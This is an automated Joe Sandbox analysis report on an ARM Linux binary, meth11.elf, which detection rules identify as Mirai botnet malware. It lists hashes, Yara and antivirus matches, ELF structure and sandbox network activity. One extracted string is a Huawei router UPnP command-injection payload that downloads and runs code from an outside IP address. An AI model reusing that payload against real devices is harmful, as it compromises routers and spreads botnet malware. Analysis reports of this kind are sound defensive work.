Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
meth11.elf

Overview

General Information

Sample name:meth11.elf
Analysis ID:1590735
MD5:33a77f8eb72b60099dd69a8671654483
SHA1:261c7b0c906e55ab9bf5b9c9ee4d56341a33436d
SHA256:66b56298af35e89710897aa0342053898738e5dcc0409145ec4eed24778834cf
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

General Information

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1590735
Start date and time:2025-01-14 14:37:46 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 24s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:meth11.elf
Detection:MAL
Classification:mal80.troj.linELF@0/0@2/0

Runtime Messages

Command:/tmp/meth11.elf
PID:5485
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Process Tree

  • system is lnxubuntu20
  • meth11.elf (PID: 5485, Parent: 5411, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/meth11.elf
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
meth11.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    meth11.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      meth11.elfLinux_Trojan_Mirai_0bce98a2unknownunknown
      • 0xe868:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
      meth11.elfMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
      • 0xe80c:$x2: /dev/misc/watchdog
      • 0xe7fc:$x3: /dev/watchdog
      • 0xe874:$s5: HWCLVGAJ

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      5485.1.00007fc988017000.00007fc988026000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
        5485.1.00007fc988017000.00007fc988026000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
          5485.1.00007fc988017000.00007fc988026000.r-x.sdmpLinux_Trojan_Mirai_0bce98a2unknownunknown
          • 0xe868:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
          5485.1.00007fc988017000.00007fc988026000.r-x.sdmpMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
          • 0xe80c:$x2: /dev/misc/watchdog
          • 0xe7fc:$x3: /dev/watchdog
          • 0xe874:$s5: HWCLVGAJ
          Process Memory Space: meth11.elf PID: 5485JoeSecurity_Mirai_6Yara detected MiraiJoe Security

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: meth11.elfAvira: detected
            Multi AV Scanner detection for submitted file
            Source: meth11.elfVirustotal: Detection: 50%Perma Link
            Source: meth11.elfReversingLabs: Detection: 60%
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
            Source: meth11.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: meth11.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: meth11.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
            Source: meth11.elf, type: SAMPLEMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
            Source: 5485.1.00007fc988017000.00007fc988026000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
            Source: 5485.1.00007fc988017000.00007fc988026000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 193.233.193.12 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 193.233.193.12 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: meth11.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
            Source: meth11.elf, type: SAMPLEMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
            Source: 5485.1.00007fc988017000.00007fc988026000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
            Source: 5485.1.00007fc988017000.00007fc988026000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
            Source: classification engineClassification label: mal80.troj.linELF@0/0@2/0
            Source: /tmp/meth11.elf (PID: 5485)Queries kernel information via 'uname': Jump to behavior
            Source: meth11.elf, 5485.1.00005588f7f1c000.00005588f804a000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
            Source: meth11.elf, 5485.1.00007ffcc3914000.00007ffcc3935000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/meth11.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/meth11.elf
            Source: meth11.elf, 5485.1.00005588f7f1c000.00005588f804a000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
            Source: meth11.elf, 5485.1.00007ffcc3914000.00007ffcc3935000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
            Source: meth11.elf, 5485.1.00007ffcc3914000.00007ffcc3935000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

            Stealing of Sensitive Information

            barindex
            Yara detected Mirai
            Source: Yara matchFile source: meth11.elf, type: SAMPLE
            Source: Yara matchFile source: 5485.1.00007fc988017000.00007fc988026000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: meth11.elf PID: 5485, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Mirai
            Source: Yara matchFile source: meth11.elf, type: SAMPLE
            Source: Yara matchFile source: 5485.1.00007fc988017000.00007fc988026000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: meth11.elf PID: 5485, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping11
            Security Software Discovery            		Remote ServicesData from Local System1
            Non-Application Layer Protocol            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
            Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service

            Malware Configuration

            No configs have been found

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            meth11.elf50%VirustotalBrowse
            meth11.elf61%ReversingLabsLinux.Trojan.Mirai
            meth11.elf100%AviraEXP/ELF.Gafgyt.X

            Dropped Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            daisy.ubuntu.com
            		162.213.35.24
            		truefalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/soap/encoding/meth11.elffalse
                		high
                http://schemas.xmlsoap.org/soap/envelope/meth11.elffalse
                  		high

                  World Map of Contacted IPs

                  No contacted IP infos

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  daisy.ubuntu.comx-8.6-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                  • 162.213.35.24
                  arc.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.24
                  rebirth.mips.elfGet hashmaliciousGafgytBrowse
                  • 162.213.35.25
                  rebirth.m68.elfGet hashmaliciousGafgytBrowse
                  • 162.213.35.25
                  a-r.m-7.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                  • 162.213.35.24
                  rebirth.x86.elfGet hashmaliciousGafgytBrowse
                  • 162.213.35.24
                  rebirth.arm4t.elfGet hashmaliciousGafgytBrowse
                  • 162.213.35.24
                  m-6.8-k.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                  • 162.213.35.25
                  armhf.elfGet hashmaliciousUnknownBrowse
                  • 162.213.35.25
                  camp.arm6.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.24

                  ASNs

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  No created / dropped files found

                  Static File Info

                  General

                  File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                  Entropy (8bit):6.021123963650733
                  TrID:
                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                  File name:meth11.elf
                  File size:62'840 bytes
                  MD5:33a77f8eb72b60099dd69a8671654483
                  SHA1:261c7b0c906e55ab9bf5b9c9ee4d56341a33436d
                  SHA256:66b56298af35e89710897aa0342053898738e5dcc0409145ec4eed24778834cf
                  SHA512:6e70217f493f74eac4506696171af899b6ef59226139275c2a1b1c3d6d61a13919cf35dbf233a309ea8b8c4dd239fb46d3cec2002168d479f865a9adbdcc75c6
                  SSDEEP:1536:n0bn462HxALQMIiBdujcJlWXZhtzzlI0iAdrN15N:PoQ2BIAlSZ7drN15
                  TLSH:1A53F856B8C18E11C5D412BBFA2E118D331367B8E2DFB2229D216F24778B96F0E37945
                  File Content Preview:.ELF..............(.....T...4...........4. ...(.....................................................$...L...........Q.td..................................-...L..................@-.,@...0....S..... 0....S.........../..0...0...@..../.$.............-.@0....S

                  Static ELF Info

                  ELF header

                  Class:ELF32
                  Data:2's complement, little endian
                  Version:1 (current)
                  Machine:ARM
                  Version Number:0x1
                  Type:EXEC (Executable file)
                  OS/ABI:UNIX - System V
                  ABI Version:0
                  Entry Point Address:0x8154
                  Flags:0x4000002
                  ELF Header Size:52
                  Program Header Offset:52
                  Program Header Size:32
                  Number of Program Headers:3
                  Section Header Offset:62360
                  Section Header Size:40
                  Number of Section Headers:12
                  Header String Table Index:11

                  Sections

                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                  NULL0x00x00x00x00x0000
                  .initPROGBITS0x80940x940x100x00x6AX004
                  .textPROGBITS0x80b00xb00xe4000x00x6AX0016
                  .finiPROGBITS0x164b00xe4b00x100x00x6AX004
                  .rodataPROGBITS0x164c00xe4c00x9500x00x2A004
                  .init_arrayINIT_ARRAY0x1f0040xf0080x40x00x3WA004
                  .fini_arrayFINI_ARRAY0x1f0080xf00c0x40x00x3WA004
                  .gotPROGBITS0x1f0100xf0140x740x40x3WA004
                  .dataPROGBITS0x1f0840xf0880x2a00x00x3WA004
                  .bssNOBITS0x1f3240xf3280x252c0x00x3WA004
                  .ARM.attributesARM_ATTRIBUTES0x00xf3280x100x00x0001
                  .shstrtabSTRTAB0x00xf3380x5d0x00x0001

                  Program Segments

                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                  LOAD0x00x80000x80000xee100xee106.06870x5R E0x8000.init .text .fini .rodata
                  LOAD0xf0040x1f0040x1f0000x3240xa84c4.15120x6RW 0x8000.init_array .fini_array .got .data .bss
                  GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                  Network Behavior

                  Network Port Distribution

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 14, 2025 14:38:36.612221956 CET5306353192.168.2.141.1.1.1
                  Jan 14, 2025 14:38:36.612289906 CET5358253192.168.2.141.1.1.1
                  Jan 14, 2025 14:38:36.619412899 CET53535821.1.1.1192.168.2.14
                  Jan 14, 2025 14:38:36.619606972 CET53530631.1.1.1192.168.2.14

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jan 14, 2025 14:38:36.612221956 CET192.168.2.141.1.1.10x3207Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                  Jan 14, 2025 14:38:36.612289906 CET192.168.2.141.1.1.10xe29eStandard query (0)daisy.ubuntu.com28IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jan 14, 2025 14:38:36.619606972 CET1.1.1.1192.168.2.140x3207No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                  Jan 14, 2025 14:38:36.619606972 CET1.1.1.1192.168.2.140x3207No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

                  System Behavior

                  General

                  Start time (UTC):13:38:33
                  Start date (UTC):14/01/2025
                  Path:/tmp/meth11.elf
                  Arguments:/tmp/meth11.elf
                  File size:4956856 bytes
                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                  Chronological Activities